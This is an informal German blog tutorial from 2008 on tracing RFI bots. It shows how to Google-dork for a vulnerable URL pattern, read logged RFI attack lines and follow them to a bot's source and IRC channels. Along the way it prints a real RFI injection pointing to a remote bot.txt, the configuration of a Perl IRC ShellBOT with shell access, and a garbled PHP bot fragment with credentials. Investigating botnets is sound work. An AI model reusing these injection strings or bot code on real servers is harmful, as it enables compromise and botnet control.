Samstag, 5. juli 2008
Tut Writer : Bloody
Rlsed : 2-3 Monate her genaue datum weissich nedmehr
Hallo, Dachte mir ich schreibe mal ein bisschen über rfi-bots. So wir wollen rfi-bots heute mal verfolgen und versuchen so an die sources/irc/etc ranzukommen. Dieses hört sich erstmal schwierieg an isst es aber nicht :)
Rlsed : 2-3 Monate her genaue datum weissich nedmehr
Hallo, Dachte mir ich schreibe mal ein bisschen über rfi-bots. So wir wollen rfi-bots heute mal verfolgen und versuchen so an die sources/irc/etc ranzukommen. Dieses hört sich erstmal schwierieg an isst es aber nicht :)
So als erstes öffnen wir doch einfach mal http://www.milw0rm.com und suchen uns ein *aktuelles rfi exploit* raus ich nehme jetzt mal http://www.milw0rm.com/exploits/5294 dort wird nun dieser bug dargestellt ############################ Bug: http://www.target.com/index.php?option=com_custompages&cpage=URL ############################ als nächstes öffnen wir nun http://www.google.de und fügen dort folgendes ein von dem bug */index.php?option=com_custompages&cpage=* (ohne die *) nun solltet ihr einige results bei google finden :) achja für die die es nicht verstehen dieses geht bei allen möglichen rfi-bugs. So kommen wir mal zum nächsten schritt :) wie ihr seht werden dort einige Internetseiten angezeigt.############################ z.b. http://sunsite.queensu.ca/accesswatch-1.32/details.html/mambots/content/mambots/content/multithumb/components/ com_simpleboard/image_upload.php ############################ wenn ihr jetzt auf diese seite draufgeht werdet ihr sehen das dort einiges gelogged wird und dort viele attacken von rfi-bots vorhanden sind wie dieser hier ############################ z.b. 125.164.236.236 00:11:07 /accesswatch-1.32/details.html/components/popup_window.php?site_isp_root=ftp:/84.32.137.157/incoming/upload/ /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/cilux_kuclux/bot.txt?? ############################ So nun haben wir ja schonmal unser opfer gefunden was wir jetzt weiterverfolgen werden :) Als nächstes werden wir uns mal den logg genauer anschauen dort können wir z.b. erkennen das dort ein ftp-adresse mit drinne ist diese hier um genau zu sein ftp:/84.32.137.157/incoming/upload/ als nächstes sehen wir dann noch einen http-link der auf einen rfi-bot verweist das ist dieser hier http://www.geocities.com/cilux_kuclux/bot.txt So da wir nun den bot haben und einen ftp-link schauen wir uns dort mal ein bissel genauer um :) Ich fange jetzt mal mit dem ftp-server an dazu öffne ich den link mit einen ftp-programm z.b. FlashFXP wir befinden uns also nun im upload ordner von dem Anonymous ftp-server dort fallen ein in diesem fall die ganzen ordner auf die dort sind welche alle am selben Tag erstellt wurden bis auf z.b. der Ordner /trec/ dieser wurde in diesem falle am 25 geändert und weicht somit von den anderen ab also schauen wir dort doch einmal rein warum sich das datum geändert hat Glückstreffer :)
So das sieht ja schonmal gut aus (naja mehr oder weniger gut für den Besitzer) nun wissen wir auch wie der bot heisst und schauen uns diesen einmal an :)
#!/usr/bin/perl
#
# ShellBOT - Atrix Team
#
# 0ldW0lf - oldwolf@atrix-team.org
# - www.atrix-team.org
# - www.atrix.cjb.net
#
#
################ CONFIGURACAO #################################################################
my $processo = 'ssh'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max='8'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='4'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=("Helen"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#star"); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick='star'; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'star'; # User ID #
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
my $servidor='irc.indoirc.net'unless $servidor; # Servidor de irc quevai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
Nunja nun wissen wir schonmal einiges mehr Admin = Helen Irc-Server = irc.indoirc.net Port = 6667 Channel = #star Botnick = star Wie wir sehen ist dieser Bot wohl auf dem indoirc gelandet schauen wir doch einmal was dort so los ist :) Leider ist zu dieser zeit grade das indoirc off :( also können wir leider dochnicht schauen was dort so los ist schade eigendlich :( Ok machen wir mal ersteinmal weiter da ich mich jetzt langsam frage was es mit dem Bot auf sich hat den wir noch als http-link haben. Schauen wir ihn uns doch auch dieses mal genau an :) Wir öffnen also im Browser den http-link http://www.geocities.com/cilux_kuclux/bot.txt und schauen uns wie zuvor den bot an :)
PK
¬¥#5¿xÕa a
siswa.txt";
print "== Connecting to $remotehost...";
$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6666"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
Sieht ja recht vielversprechend aus :) muss ich sagen wenn man sich die 2 verschiedenen bots mal genau anschaut sieht man das der obere Bot vom Atrix Team eine sehr sehr alte version ist. Schauen wir uns nun den unteren an sieht mehr selbstgemacht aus und hat auch viele usernamen :) das sollte also auch heissen das dieser Bot auf die exploited rfi-bug Server draufgeladen wird:( ok sammeln wir auch hier die daten :) Admin = ciluX Bot-pw = njajal Channel = #ngunut Irc-Server = "irc.dustshell.com","irc.cbn.net.id","irc.jmn.net.id","irc.indika.net.id","irc.plasa.com" Port = 6667 So hier sehen wir das dieser bot eindeutig auf mehrere irc-server gleichzeitig zugreift schauen wir uns das doch hier an mal einfach an hoffe es geht jetzt XD
* Connecting to irc.dustshell.com (6667) - -dustshell.us.allnetwork.org- *** Looking up your hostname... - -dustshell.us.allnetwork.org- *** Checking Ident - -dustshell.us.allnetwork.org- *** Found your hostname - -dustshell.us.allnetwork.org- *** No Ident response
juhu sieht doch shcon gleich besser aus :) scheint wohl *noch* ein aktiver bot zu sein :( wir werden es wohl gleich sehen :)Ansonsten noch einen schönen Tag noch :) mfg BloodySieht ja ganz schön voll aus dort :( um genauzusein sind derzeit 107 User/bots im channel drinnen was denke ich aufm ersten blink schon recht viele sind da die meisten zwischen 10Mbit und 100Mbit haben werden und das heist das der Admin mit den Bots dann shcon einen gewaltigen *schaden* anrichten kann z.b. zum ddosen von Firmen/internetseiten/etc. So leude, ich hoffe ich konnte euch ein bisschen mehr in die welt der rfi-bots entführen :) und ich hoffe mal das ihr auch verstanden habt wie ihr also ab jetzt sogenannte rfi-botnetzwerke Kinderleicht finden könnt :)
Neueste Kommentare